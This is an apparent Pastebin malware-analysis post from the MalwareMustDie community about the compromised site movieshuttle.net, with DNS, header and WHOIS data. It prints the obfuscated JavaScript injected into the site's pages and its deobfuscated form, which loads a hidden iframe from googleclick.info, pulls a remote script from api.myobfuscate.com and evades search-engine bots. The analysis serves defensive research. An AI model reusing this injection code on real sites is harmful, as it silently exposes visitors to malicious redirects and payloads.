Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #MalwareMustDie! @unixfreaxjp /malware]$ date
- Sat Mar 2 02:09:41 JST 2013
- // And also beware of: movieshuttle.net / 50.87.40.75
- // Same as oklahomanews-online.com.. malicious TDS..
- movieshuttle.net A 50.87.40.75
- movieshuttle.net NS ns1.rhostjh.com
- movieshuttle.net NS ns2.rhostjh.com
- h00p://movieshuttle.net/american-reunion-2012.html
- or
- h00p://movieshuttle.net/american-reunion-2012.html
- h00p://movieshuttle.net/yohan-barnevandrer-2010.html
- h00p://movieshuttle.net/tag/1937
- h00p://movieshuttle.net/hoodwinked-too-hood-vs-evil-2011.html
- h00p://movieshuttle.net/flame-and-citron-2008.html
- // Headers...
- --2013-03-02 01:58:43-- h00p://movieshuttle.net/beautiful-boy-2010.html
- Resolving movieshuttle.net... seconds 0.00, 50.87.40.75
- Caching movieshuttle.net => 50.87.40.75
- Connecting to movieshuttle.net|50.87.40.75|:80... seconds 0.00, connected.
- :
- h00p/1.1 200 OK
- Date: Fri, 01 Mar 2013 16:58:27 GMT
- Server: Apache
- X-CF-Powered-By: WP 1.3.9
- X-Pingback: h00p://movieshuttle.net/xmlrpc.php
- Link: <h00p://movieshuttle.net/?p=3263>; rel=shortlink
- Cache-Control: max-age=31104000
- Expires: Mon, 24 Feb 2014 16:58:27 GMT
- Vary: Accept-Encoding
- Connection: close
- Content-Type: text/html; charset=UTF-8
- 200 OK
- Length: unspecified [text/html]
- Saving to: `beautiful-boy-2010.html'
- 2013-03-02 01:58:46 (91.0 KB/s) - `beautiful-boy-2010.html' saved [108323]
- // got this script....2 times injected in every pages...
- :
- <script language="javascript" type="text/javascript">var lO1='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';var _Ox84de=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzO123456789+/=","","charAt","indexOf","fromCharCode","length"];function _O1O(data){var O1OlOI=_Ox84de[O];var o1,o2,o3,h1,h2,h3,h4,bits,i=O,enc=_Ox84de[1];do{h1=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));h2=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));h3=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));h4=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&Oxff;o2=bits>>8&Oxff;o3=bits&Oxff;if(h3==64){enc+=String[_Ox84de[4]](o1);} else {if(h4==64){enc+=String[_Ox84de[4]](o1,o2);} else {enc+=String[_Ox84de[4]](o1,o2,o3);} ;} ;} while(i<data[_Ox84de[5]]);;return enc;} ;function O1O(string){var ret=_Ox84de[1],i=O;for(i=string[_Ox84de[5]]-1;i>=O;i--){ret+=string[_Ox84de[2]](i);} ;return ret;} ;eval(_O1O(O1O(lO1)));</script><script>try{window.document.body/=2}catch(dgsgsdg){whwej=12;ww=window;}if(whwej){try{f=document.createElement("div");}catch(agdsg){whwej=O;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","3O","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","4O","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","4O","29","1d","1n","1m","1m","1d","16","4O","3n","41","3p","4O","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","4O","26","1n","1m","1m","48","4g","27","4O","3n","41","3p","4O","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","4O","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","4O","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","4O","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","4O","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4O","3n","41","3p","4O","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","3O","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","4O","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=O;i-63O!=O;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}</script>
- :
- // deobfs...
- var _escape = '
- %3Ciframe%20src%3D%22h00p%3A//googleclick.info/%3Ftravel%22%20width%3D5%20height%3D5%20frameborder%3D5%3E%3C/iframe%3E';
- if (window.navigator.userAgent.indexOf('Rambler') >= 0 || window.navigator.userAgent.indexOf('Yandex') >= 0 || window.navigator.userAgent.indexOf('Yaho') >= 0 || window.navigator.userAgent.indexOf('Googlebot') >= 0 || window.navigator.userAgent.indexOf('Turtle') >= 0){
- Break();
- }
- ;
- document.onselectstart = function (){
- return false;
- }
- ;
- document.onmousedown = function (){
- return false;
- }
- ;
- document.oncontextmenu = function (){
- return false;
- }
- ;
- document.onkeydown = function (e){
- e = e || window.event;
- if (e.ctrlKey){
- if ((e.keyCode == '85') || (e.keyCode == '67') || (e.keyCode == '65') || (e.keyCode == '45'))return false;
- }
- }
- ;
- document.onkeypress = function (e){
- e = e || window.event;
- if (e.ctrlKey){
- if ((e.keyCode == '85') || (e.keyCode == '67') || (e.keyCode == '65') || (e.keyCode == '45'))return false;
- }
- }
- ;
- document.ondragstart = function (){
- return false;
- }
- ;
- function atlpdp1(){
- for (wi = 0; wi < document.all.length; wi ++ ){
- if (document.all[wi].style.visibility != 'hidden'){
- document.all[wi].style.visibility = 'hidden';
- document.all[wi].id = 'atlpdpst'
- }
- }
- }
- function atlpdp2(){
- for (wi = 0; wi < document.all.length; wi ++ ){
- if (document.all[wi].id == 'atlpdpst')document.all[wi].style.visibility = ''
- }
- }
- window.onbeforeprint = atlpdp1;
- window.onafterprint = atlpdp2;
- var _0OO = document.createElement('script');
- _0OO.src = 'h00p://api.myobfuscate.com/?getsrc=ok' + '&ref=' + encodeURIComponent(document.referrer) + '&url=' + encodeURIComponent(document.URL);
- var OIl = document.getElementsByTagName('head')[0];
- OIl.appendChild(_0OO);
- document.write(unescape(_escape));
- // Leads to the same IFRAMER....
- if (document.getElementsByTagName('body')[0]){
- iframer();
- }
- else {
- document.write("
- <iframe src='h00p://googleclick.info/?travel' width='100' height='100' style='width:100px;
- height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
- }
- function iframer(){
- var f = document.createElement('iframe');
- f.setAttribute('src', 'h00p://googleclick.info/?travel');
- f.style.left = '-10000px';
- f.style.visibility = 'hidden';
- f.style.top = '0';
- f.style.position = 'absolute';
- f.style.top = '0';
- f.setAttribute('width', '100');
- f.setAttribute('height', '100');
- document.getElementsByTagName('body')[0].appendChild(f);
- }
- //who's responsible for googleclick.info?
- Domain ID:D49081589-LRMS
- Domain Name:GOOGLECLICK.INFO
- Created On:01-Feb-2013 07:48:44 UTC
- Last Updated On:26-Feb-2013 05:48:36 UTC
- Expiration Date:01-Feb-2014 07:48:44 UTC
- Sponsoring Registrar:DomainContext Inc. (R524-LRMS)
- Status:CLIENT TRANSFER PROHIBITED
- Status:TRANSFER PROHIBITED
- Registrant ID:PP-SP-001
- Registrant Name:Domain Admin
- Registrant Organization:PrivacyProtect.org
- :
- Name Server:NS1D3.STATUSHOST.RU
- Name Server:NS2D3.STATUSHOST.RU
- // Just block this.. an infector anyway.
- ----
- #MalwareMustDie!
Add Comment
Please, Sign In to add comment